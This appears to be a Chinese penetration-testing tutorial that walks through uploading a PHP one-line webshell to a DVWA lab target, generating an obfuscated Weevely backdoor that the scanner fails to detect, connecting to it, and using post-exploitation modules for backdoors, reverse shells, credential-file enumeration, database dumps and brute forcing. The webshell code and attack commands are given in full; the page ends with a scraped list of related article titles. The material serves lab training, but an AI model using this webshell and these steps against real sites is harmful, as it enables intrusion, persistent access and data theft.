渗透测试常用工具-使用Weevely工具上传一句话木马

预备知识

Weevely在上传木马进行后渗透测试的过程中可用于模拟一个类似于telnet的连接shell
通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理
Weevely生成的服务器端php代码经过了base64编码,可以绕过主流的杀毒软件和IDS
上传服务器端代码后通常可以通过weevely直接运行
使用它可以浏览文件系统,检测服务器设置,创建tcpshell和reverse shell。客户端为运行Weevely进程的计算机,服务端为存有PHP木马的服务器在客户端,Weevely每执行一条命令就通过HTTP协议发出一条GET/POST请求在服务端,木马针对每条GET/POST请求作出响应,产生一条响应包。

第一步

输入firefox命令来打开火狐浏览器,然后在地址栏里输入靶机的地址访问网页

第二步

使用默认用户名admin密码password登录

第三步

点击DVWA Security 将安全级别设置为low

第四步

在/root目录下生成一个shell.php文件,文件内容为php一句话木马:
<?php @eval($_POST['hello']);?>

第五步

转到File Upload页面然后点击Browse选择刚生成的shell.php一句话木马文件进行上传


第六步

使用网站安全狗对网页根路径进行常规扫描


第七步

打开终端,使用weevely命令来启动工具


第八步

连接weevely生成的木马 :    weevely <URL> <password> [cmd]加载session会话文件 :      weevely session <path> [cmd]生成weevely后门木马文件 :  weevely generate <password> <path>

第九步

使用命令:    weevely generate hello /root/hello.php
(hello为密码,/root/hello.php为输出路径)来生成weevely一句话木马

第十步

再次将生成的木马上传至目标靶机网站上
详细步骤参考第六步操作,并在靶机服务器上重新扫描扫描结果如下:
还是只检测到shell.php而hello.php并未检测出为网页木马

第十一步

使用命令
weevely http://172.16.1.15/hackable/uploads/hello.php hello
连接weevely木马

第十二步

输入任意键回车后进入虚拟终端界面

第十三步

在虚拟终端模式,按Tab键查看可以利用的weevley模块,在需要使用的模块前面加上“:”

第十四步

使用命令:
audit_phpconf
查看目标靶机服务器php的配置文件

第十五步

使用命令:
file_upload /root/hello.php backdoor.php
上传本地文件到目标服务器上

第十六步

使用命令:file_check来检查目标站点下文件的状态及参数信息
(md5值,大小,权限等)

下面file_check对应的命令的具体作用为:

:file_check Md5         文件的md5值
:file_check size        文件大小
:file_check file        判断是文件还是文档
:file_check exists      判断文件是否存在
:file_check perms       文件权限值
:file_check datetime    创建日期

总结一下weevely常用的模块

system.info                 收集系统信息文件
file.rm                     删除文件
file.read                   读文件
file.upload                 上传本地文件
file.check                  检查文件的权限和
file.enum                   在本地词表的书面枚举远程文件
file.download               下载远程二进制/ASCII文件到本地SQL
sql.query                   执行SQL查询
sql.console                 启动SQL控制台
sql.dump                    获取SQL数据库转储
sql.summary                 获取SQL数据库中的表和列后门
backdoor.tcp                TCP端口后门
backdoor.install            安装后门
backdoor.reverse_tcp        反弹枚举
audit.user_files            在用户家中列举常见的机密文件
audit.user_web_files        列举常见的Web文件
audit.etc_passwd            枚举/etc/passwd查找
find.webdir                 查找可写的web目录
find.perm                   查找权限可读/写/可执行文件和目录
find.name                   按名称查找文件和目录
find.suidsgid               查找SUID/SGID文件和目录暴破
bruteforce.sql              暴力破解单一SQL用户
bruteforce.sql_users        暴力破解SQL密码
bruteforce.ftp              暴力破解单一FTP用户
bruteforce.ftp_users        暴力破解FTP密码

使用Weevely工具上传一句话木马相关推荐

  1. P100:045-使用Weevely工具上传一句话木马

    045-使用Weevely工具上传一句话木马 使用Weevely工具上传一句话木马 实验环境说明: 渗透机:kali-7(Kali Linux) 用户名:root 密码:toor 靶   机:win0 ...

  2. Weevely工具上传一句话木马

    漏洞原理:Weevely在上传木马进行后渗透测试的过程中可用于模拟一个类似于telnet的连接shell,通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理 ...

  3. SQL注入上传一句话木马

    利用sql注入上传一句话木马 导读 1. sql注入的危害 2. 文件写入 2.1 webshell.一句话木马.后门 webshell(大马) 一句话木马 木马文件的危害 2.2 文件写入的前提条件 ...

  4. 文件上传一句话木马,用菜刀进行连接

    菜刀工具 提取码:tg6t 关于文件上传 文件上传是指由于网站没有任何过滤或者防护措施有限,而会被上传一些恶意文件,有些用户利用这个漏洞上传一句话木马(webshell),上传成功后就可以利用中国菜刀 ...

  5. 中国菜刀上传一句话木马,巴西烤肉提权

    如何使用中国菜刀上传一句话木马呢,今天我来教大家 首先在你的电脑上创建一个文本文件,内容写上一句话木马,可以是asp,也可以是PHP,注意更改value值.但是最后文件名后缀要改成.jpg.格式可以如 ...

  6. 网络安全:文件上传 + 一句话木马原理 + 菜刀的简单使用

    很多的网站提供了文件上传功能,虽然提供了方便的服务,但稍有疏忽,就可能酿成大祸. 这里的疏忽是指,不对用户上传的内容进行检查. 仍旧以DVWA为例: 网站的本意是接受用户的图片(image),但后台代 ...

  7. 文件上传一句话木马getshell

    文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 一句话木马: 1.在phpstudy搭建的站点www目录下写入一个 ...

  8. 基于DVWA文件上传,包含漏洞,上传一句话木马基础分析

    木马 <?php @eval($_POST[value]); ?> 这是这个php程序,这个名字源于古希腊的传说这里就不说了,等于是一个别人家服务器在管理者不知情的情况下给你开了个后门你就 ...

  9. 网站有上传后门木马的漏洞怎么解决

    SINE安全又带上业务逻辑漏洞来跟大家做分享了,这一次的主题内容是上传文件漏洞.许许多多企业网站都准许客户自己图片上传.电子版资料,假如上传功能并没有搞好安全防护对策,就存有极大的安全隐患.假如网站应 ...

最新文章

  1. 何恺明CVPR演讲:深入理解ResNet和视觉识别的表示学习(41 PPT)
  2. BIO与NIO、AIO的区别(这个容易理解)
  3. cocos3 深入理解tank和子弹之间的关系
  4. linux进程端口防火墙
  5. 统一沟通-技巧-9-Lync 2010-Outlook 2010-自动配置-2-普通人员
  6. java 顺序栈_Java实现顺序栈
  7. 迷宫(信息学奥赛一本通-T1215)
  8. Linux中的软件源详解,linux软件管理构建本地源实例详解
  9. 《华为交换机学习指南》学习笔记·二
  10. jvm垃圾回收机制(GC)
  11. 国产化性能最高的服务器,盘点服务器国产化呼声背后的优秀厂商
  12. 解决序列号不正确无法安装Win2003 SP1
  13. Linux man命令的使用方法 man page 显示数字的意思
  14. 港科夜闻|香港科大彭倩教授分析疫情下企业如何减低投资损失
  15. 未来人工智能发展面临的问题
  16. 如何打开计算机任务管理器,电脑任务管理器怎么打开
  17. php条件查询,PHP-----多条件查询(示例代码)
  18. 易飞ERP进货单源码——复制报价单
  19. (翻译)所见即所得(WYSIWYG)
  20. MVC三层架构简单理解

热门文章

  1. 河南本科计算机科学与技术排名,河南计算机科学与技术专业大学排名
  2. maven 程序包不存在 https://repo.maven.apache.org/maven2 was cac hed in the local repository
  3. ELO(埃洛匹配分制度)Java篇
  4. 谷歌卫星地图下载器bigemap的优势
  5. BZOJ.1812.[IOI2005]Riv 河流(树形背包)
  6. 【python数据分析实战】城市餐饮店铺选址问题(1)—— 对不同菜系进行比较,并筛选出可开店铺的餐饮类型
  7. get_article_info
  8. 单边指数信号的傅立叶matlab,实验四连续信号的傅立叶变换
  9. 64位操作系统和32位的区别介绍【详解】
  10. SilverLight合计行设计